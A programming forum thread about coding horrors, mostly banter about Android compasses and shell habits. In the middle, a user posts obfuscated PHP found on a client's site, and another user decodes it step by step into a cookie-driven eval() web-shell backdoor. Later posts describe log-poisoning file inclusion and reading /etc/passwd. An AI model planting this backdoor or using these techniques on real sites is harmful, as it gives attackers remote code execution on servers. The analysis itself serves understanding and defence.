Register a SA Forums Account here!
JOINING THE SA FORUMS WILL REMOVE THIS BIG AD, THE ANNOYING UNDERLINED ADS, AND STUPID INTERSTITIAL ADS!!!

You can: log in, read the tech support FAQ, or request your lost password. This dumb message (and those ads) will appear on every screen until you register! Get rid of this crap by registering your own SA Forums Account and joining roughly 150,000 Goons, for the one-time price of $9.95! We charge money because it costs us money per month for bills, and since we don't believe in showing ads to our users, we try to make the money back through forum registrations.

Smugdog Millionaire
Sep 14, 2002

8) Blame Icefrog
Today I had to debug an issue where a developer "refactored" a static class by just removing all the static modifiers. As it turns out, there are meaningful differences between StaticClass.Property = true and new UsedToBeStatic().Property = true.

Adbot
ADBOT LOVES YOU

QuarkJets
Sep 8, 2008

Suspicious Dish posted:

I adore your naivety. It makes me happy.

It's true, I only hosed around with writing an Android app and that was years ago. Are there major differences that I didn't uncover in my tiny bit of experience?

pseudorandom name
May 6, 2007

vOv
Feb 8, 2014

Which way is actual north?

Doctor w-rw-rw-
Jun 24, 2008

QuarkJets posted:

It's true, I only hosed around with writing an Android app and that was years ago. Are there major differences that I didn't uncover in my tiny bit of experience?

I once chronicled my descent into depression and madness as a result of trying to implement a fragment-based video player with externally loaded video ads and backed by a persistent model cache I rolled myself.

In retrospect I learned a lot about making good applications by being unable to trust the terrible platform I had available to me, but god drat Android is a terrible platform to tackle alone.

Carthag Tuek
Oct 15, 2005

Tider skal komme,
tider skal henrulle,
slægt skal følge slægters gang

vOv posted:

Which way is actual north?

Trick question, they're all on the south pole.

FoiledAgain
May 6, 2007

What is going on here? And how come only the two on the bottom right aren't changing?

Simulated
Sep 28, 2001
Lowtax giveth, and Lowtax taketh away.
College Slice

FoiledAgain posted:

What is going on here? And how come only the two on the bottom right aren't changing?

It's demonstrating the extremely crappy quality of Android devices in general; all of those devices claim to have a compass, yet we can clearly see they are producing wildly varying and/or broken output.

ultramiraculous
Nov 12, 2003

"No..."
Grimey Drawer

QuarkJets posted:

Doctor w-rw-rw- posted:

I once chronicled my descent into depression and madness as a result of trying to implement a fragment-based video player with externally loaded video ads and backed by a persistent model cache I rolled myself.

Basically you need to read the good Dr 666's posts in the Android thread, then this, which is where the compass gif is from. Basically Android as a software platform is ok until you realize that hardware vendors are found as far as lying about what their hardware can do.

pigdog
Apr 23, 2004

by Smythe

Ender.uNF posted:

It's demonstrating the extremely crappy quality of Android devices in general; all of those devices claim to have a compass, yet we can clearly see they are producing wildly varying and/or broken output.

Or they themselves generate a magnetic field that makes devices next to them act crappy, or they may be placed on a table that is made out of metal / near a big chunk of metal.

Volmarias
Dec 31, 2002

EMAIL... THE INTERNET... SEARCH ENGINES...

pigdog posted:

Or they themselves generate a magnetic field that makes devices next to them act crappy, or they may be placed on a table that is made out of metal / near a big chunk of metal.

I discovered this myself. Several years ago, I read an article in MAKE about someone who had made a belt with a compass and vibration modules, with the idea that he would always vibrate to the north. This gave him a new way to go about the world, and he had much better locational awareness.

Well, that's not so hard, I can do this with a cellphone! It has a compass and a vibrator, and I can work out some encoding! Unfortunately, after several bizarre results, I found that using the vibrator affected the compass and made it unreliable. On the plus side, now I was always facing north! :v:

ohgodwhat
Aug 6, 2005

ultramiraculous posted:

Basically you need to read the good Dr 666's posts in the Android thread, then this, which is where the compass gif is from. Basically Android as a software platform is ok until you realize that hardware vendors are found as far as lying about what their hardware can do.

All I learned from this is, man, people really tie their identity to what phone they have in their pocket. God, phonespergs are dumb.

Thermopyle
Jul 1, 2003

...the stupid are cocksure while the intelligent are full of doubt. —Bertrand Russell

ohgodwhat posted:

All I learned from this is, man, people really tie their identity to what phone they have in their pocket. God, phonespergs are dumb.

Try moderating a forum full. It's entertaining.

Doctor w-rw-rw-
Jun 24, 2008

ohgodwhat posted:

I think that's way out of line. I program phones for a living, and have been for half a decade now. I do 40 hours a week of work and ~20 hours a week of related personally-relevant mobile work, which takes up more than half my waking hours ((24-8) * 7 == 112). You must hate anyone who invests themselves heavily into improving their skills, if your way of feeling secure is to insult them. (EDIT: retracted based on vvvv)

My top three goals are/were generally performance, stability, and quality. Android is a total nightmare on every count. And with no coworkers to validate the shittiness, all time estimates that didn't satisfy the VP of engineering were assumed to be unrealistic and overly padded.

Crunchyroll is another horror in itself, where developers are paid poo poo, non-developers are paid less than poo poo, yes-men get promoted, and senior employees who produce good things lock themselves in by doing so, into staying in their current role. :(

Doctor w-rw-rw- fucked around with this message at 19:28 on May 31, 2014

ohgodwhat
Aug 6, 2005

EDIT: I think there's been some confusion here. I didn't put your name and Dr 666 together. I wasn't referring to anything you had done, but rather the comments on that Bounden article.

ohgodwhat fucked around with this message at 18:01 on May 31, 2014

Phone
Jul 30, 2005

親子丼をほしい。

Doctor w-rw-rw- posted:

I think that's way out of line. I program phones for a living, and have been for half a decade now. I do 40 hours a week of work and ~20 hours a week of related personally-relevant mobile work, which takes up more than half my waking hours ((24-8) * 7 == 112). You must hate anyone who invests themselves heavily into improving their skills, if your way of feeling secure is to insult them.

My top three goals are/were generally performance, stability, and quality. Android is a total nightmare on every count. And with no coworkers to validate the shittiness, all time estimates that didn't satisfy the VP of engineering were assumed to be unrealistic and overly padded.

Crunchyroll is another horror in itself, where developers are paid poo poo, non-developers are paid less than poo poo, yes-men get promoted, and senior employees who produce good things lock themselves in by doing so, into staying in their current role. :(

This is a lot of words to say "Stop saying mean stuff about my Windows Phone/iPhone/Android".

Simulated
Sep 28, 2001
Lowtax giveth, and Lowtax taketh away.
College Slice

pigdog posted:

Nope. The table is clearly a plastic folding table.

John Gruber did a quick comparison of iOS devices in a similar arrangement: http://daringfireball.net/linked/2014/05/20/gyroscope-fragmentation

Honestly, I don't understand why this is even controversial.

BREAKING NEWS: Hardware manufacturers cheap out on components in the race to the bottom, open platform enforces no standards, consumers bewildered; NEWS AT 11.

Thermopyle
Jul 1, 2003

...the stupid are cocksure while the intelligent are full of doubt. —Bertrand Russell

Phone posted:

This is a lot of words to say "Stop saying mean stuff about my Windows Phone/iPhone/Android".

I think your reading comprehension skills need some work.

chippy
Aug 16, 2006

OK I DON'T GET IT
The compass on my S3 is loving terrible. If you stick it down flat the needle will stay still, but if you move it about at all, what it thinks is North will wander about all over the place in like a 45-60 degree range. I was shocked when I upgraded from a HTC Desire and found it to be far worse for geocaching.

fritz
Jul 26, 2003

Compasses can be hell to calibrate and keep calibrated but: jesus christ.

Blotto Skorzany
Nov 7, 2008

He's a PSoC, loose and runnin'
came the whisper from each lip
And he's here to do some business with
the bad ADC on his chip
bad ADC on his chiiiiip

Ender.uNF posted:

John Gruber did a quick comparison of iOS devices in a similar arrangement: http://daringfireball.net/linked/2014/05/20/gyroscope-fragmentation

Honestly, I don't understand why this is even controversial.

BREAKING NEWS: Hardware manufacturers cheap out on components in the race to the bottom, open platform enforces no standards, consumers bewildered; NEWS AT 11.

The poor quality of some Android devices' compasses probably the major driver of the wacky behavior in that vine, but Gruber's comparison isn't as slam dunk as he thinks it is - the iphones and ipads have much better radiated immunity and also tend to radiate somewhat less than most of the cheap Android phones and tablets, so they are probably interfering with each other quite a bit less as well (in addition to the general problem of trying to compare the sets when neither is being tested in an EMC lab).

Dessert Rose
May 17, 2004

awoken in control of a lucid deep dream...

Otto Skorzeny posted:

the iphones and ipads have much better radiated immunity and also tend to radiate somewhat less

What I'm hearing here is that Android devices are more likely to give you cancer.

Blotto Skorzany
Nov 7, 2008

He's a PSoC, loose and runnin'
came the whisper from each lip
And he's here to do some business with
the bad ADC on his chip
bad ADC on his chiiiiip

Dessert Rose posted:

What I'm hearing here is that Android devices are more likely to give you cancer.

Well they certainly are more likely to give you an aneurysm from gc pauses

bobthecheese
Jun 7, 2006
Although I've never met Martha Stewart, I'll probably never birth her child.
LOLOLOL PHP LOL I know. Shut up.

I just found this in a client's site:

php:
<?php
$edme="RraoPSc0OaoTFxbDJ3Y2xYOVBRcmpwMHQnaoO2VjaG8gJzwaonLiRrLic+JztaolaodmFsKaoGJhc2U";
$xtnl="JGM9Jao2NvaodW5ao0JzaoskYT0kX0NPT0taoJRTtpZihyZXaoNldCgkYSkao9PSdSNCaocaogJiYaogJGMoJGEpPaojMpey";
$ckxg str_replace("w","","wstrw_wrewpwlwawcwe");
$leel="cnJheSgnJaoyaownKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNoaobyAnPC8nLiRrLic+Jztao9";
$uexh="2NF9kZWNvZGUocHJaolaoZao19aoyZXBsYWaoNaolKGFycmFao5KCcvWao15cdzao1cc10vJywaonaoL1xzLyaocpLCBh";
$hkux $ckxg("x""""xbxasxex6x4x_xdexcoxde");
$yawc $ckxg("s","","scsrsesatses_fsusnscstsisosn");
$altp $yawc(''$hkux($ckxg("ao"""$xtnl.$edme.$uexh.$leel))); $altp();
?>

Ugggh.

Deus Rex
Mar 5, 2005

Oh god when I realized what that was doing. :laffo: I wrote PHP for a living for like 2 years and never knew a string was callable like that.

kitten smoothie
Dec 29, 2001

Can't tell if this was some awful attempt at intentionally obfuscating code, because this also looks like the sort of malware I've seen injected into hacked Wordpress sites.

Impotence
Nov 8, 2010
Lipstick Apathy

bobthecheese posted:

LOLOLOL PHP LOL I know. Shut up.

I just found this in a client's site:

php:
<?php
$edme="RraoPSc0OaoTFxbDJ3Y2xYOVBRcmpwMHQnaoO2VjaG8gJzwaonLiRrLic+JztaolaodmFsKaoGJhc2U";
$xtnl="JGM9Jao2NvaodW5ao0JzaoskYT0kX0NPT0taoJRTtpZihyZXaoNldCgkYSkao9PSdSNCaocaogJiYaogJGMoJGEpPaojMpey";
$ckxg str_replace("w","","wstrw_wrewpwlwawcwe");
$leel="cnJheSgnJaoyaownKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7ZWNoaobyAnPC8nLiRrLic+Jztao9";
$uexh="2NF9kZWNvZGUocHJaolaoZao19aoyZXBsYWaoNaolKGFycmFao5KCcvWao15cdzao1cc10vJywaonaoL1xzLyaocpLCBh";
$hkux $ckxg("x""""xbxasxex6x4x_xdexcoxde");
$yawc $ckxg("s","","scsrsesatses_fsusnscstsisosn");
$altp $yawc(''$hkux($ckxg("ao"""$xtnl.$edme.$uexh.$leel))); $altp();
?>

Ugggh.

i got bored and decided to poke at it

php:
<?php
$ckxg "str_replace";
$hkux "base64_decode";
$yawc "create_function";
// prevent breaking tables. remove newlines here
$altp create_function(''base64_decode("JGM9J2NvdW50JzskYT0kX0NPT0tJRTtpZihyZXNldCgkYSk9PSdSNCcgJiYgJGMoJGEpPjMpeyRrPSc0O
TFxbDJ3Y2xYOVBRcmpwMHQnO2VjaG8gJzwnLiRrLic+JztldmFsKGJhc2U2NF9kZWNvZGUocHJlZ19yZXBsYWNlKGFycmF5K
CcvW15cdz1cc10vJywnL1xzLycpLCBhcnJheSgnJywnKycpLCBqb2luKGFycmF5X3NsaWNlKCRhLCRjKCRhKS0zKSkpKSk7Z
WNobyAnPC8nLiRrLic+Jzt9")); 
$altp();
?>

php:
<?php
// $altp() is calling this vvvvvvvvvvvvvvvv

$c='count';$a=$_COOKIE;
if(reset($a)=='R4' && $c($a)>3){$k='491ql2wclX9PQrjp0t';
echo '<'.$k.'>';eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'),
array('','+'), join(array_slice($a,$c($a)-3)))));echo '</'.$k.'>';}
?>

php:
<?php
// $a = user input
$a $_COOKIE;
if (reset($a) == 'R4' && count($a) > 3) {
    echo '<491ql2wclX9PQrjp0t>';
    eval(base64_decode(preg_replace(array(
        '/[^\w=\s]/',
        '/\s/'
    ), array(
        '',
        '+'
    ), join(array_slice($acount($a) - 3)))));
    echo '</491ql2wclX9PQrjp0t>';
// executes (with eval()) contents of a cookie and sends it back out to the page
}

definitely malware.

Impotence fucked around with this message at 02:14 on Jun 3, 2014

b0lt
Apr 29, 2005
Scala is not strong enough :(

slam5000
Aug 19, 2012
Oh dear god. That PHP code is scaring me. Put it away please. Why would anyone think that was a good idea! :gonk:

kitten smoothie
Dec 29, 2001

Biowarfare posted:

definitely malware.

Wow. I've seen some interesting ways of passing shell commands but using a cookie is a new one. Most kids just use POST params. I wonder if it was an attempt to bypass IDS filters.

Impotence
Nov 8, 2010
Lipstick Apathy

kitten smoothie posted:

Wow. I've seen some interesting ways of passing shell commands but using a cookie is a new one. Most kids just use POST params. I wonder if it was an attempt to bypass IDS filters.

This is very common now. The cookie is also base64 encoded and mangled, so there isn't plantext command visible. And cookies are generally not logged.

Westie
May 30, 2013

Baboon Simulator

kitten smoothie posted:

The best one I've ever "seen" was <?php echo "hello world"; exit; ?> in Apache logs as the user agent, then the apache access log was included into the page if RFI vulnerable.

This can also be done for FTP/whatever else service uses logs.

PHP is really goddamn retarded at times.

Impotence
Nov 8, 2010
Lipstick Apathy

Westie posted:

PHP is really goddamn retarded at times.

This is because idiots use include() which evaluates the file vs echo(file_get_contents()) which prints the file as text, not a PHP thing. There are worse things with PHP, but this is explicitly said in the manual that PHP will be evaluated with an include()

Westie
May 30, 2013

Baboon Simulator

Westie posted:

The best one I've ever "seen" was <?php echo "hello world"; exit; ?> in Apache logs as the user agent, then the apache access log was included into the page if RFI vulnerable.

I mean LFI, oops.

Biowarfare posted:

This is because idiots use include() which evaluates the file vs echo(file_get_contents()) which prints the file as text, not a PHP thing. There are worse things with PHP, but this is explicitly said in the manual that PHP will be evaluated with an include()

Yes, that is correct, but one would expect that someone would be able to set the include path properly, so hey, being able to include("../../../../../../../../../../etc/passwd") becomes impossible...

baby puzzle
Jun 3, 2011

I'll Sequence your Storm.
Programmers that don't use shortcut keys. Ever.

Edit: I mean not even hitting enter to do the default action of a dialog. Literally dragging their stupid mouse over and clicking "Find Next" after typing a search string.

baby puzzle fucked around with this message at 17:08 on Jun 3, 2014

Edison was a dick
Apr 3, 2010

direct current :roboluv: only

baby puzzle posted:

Programmers that don't use shortcut keys.

This, but on a command line.
You can use cd on a directory path! Don't just cd to the first path component and use ls to see where you are.

Double tap tab to list all the completions. That will tell you what's in there.
Then, since you made it all the way there in one command, you can use cd - to get back to where you were.

At least he knew about ctrl-r

FlapYoJacks
Feb 12, 2009

Edison was a dick posted:

This, but on a command line.
You can use cd on a directory path! Don't just cd to the first path component and use ls to see where you are.

Double tap tab to list all the completions. That will tell you what's in there.
Then, since you made it all the way there in one command, you can use cd - to get back to where you were.

At least he knew about ctrl-r

Not double tabbing is the source of a lot of frustration when it comes to my boss.

Stop typing everything manually! :argh:

JawnV6
Jul 4, 2004

So hot ...
Typing is typically on y'all's critical path?

New Yorp New Yorp
Jul 18, 2003

Only in Kenya.
Pillbug
I dictate all my code to my assistant.

Adbot
ADBOT LOVES YOU

Zopotantor
Feb 24, 2013

...und ist er drin dann lassen wir ihn niemals wieder raus...

JawnV6 posted:

Typing is typically on y'all's critical path?

No, but spending five minutes watching somebody do a task I could do in as many seconds, is.

My own nemeses are people who don't know what a path name is. You can type emacs butt/fart/dick.txt, you don't have to loving cd there first.:argh: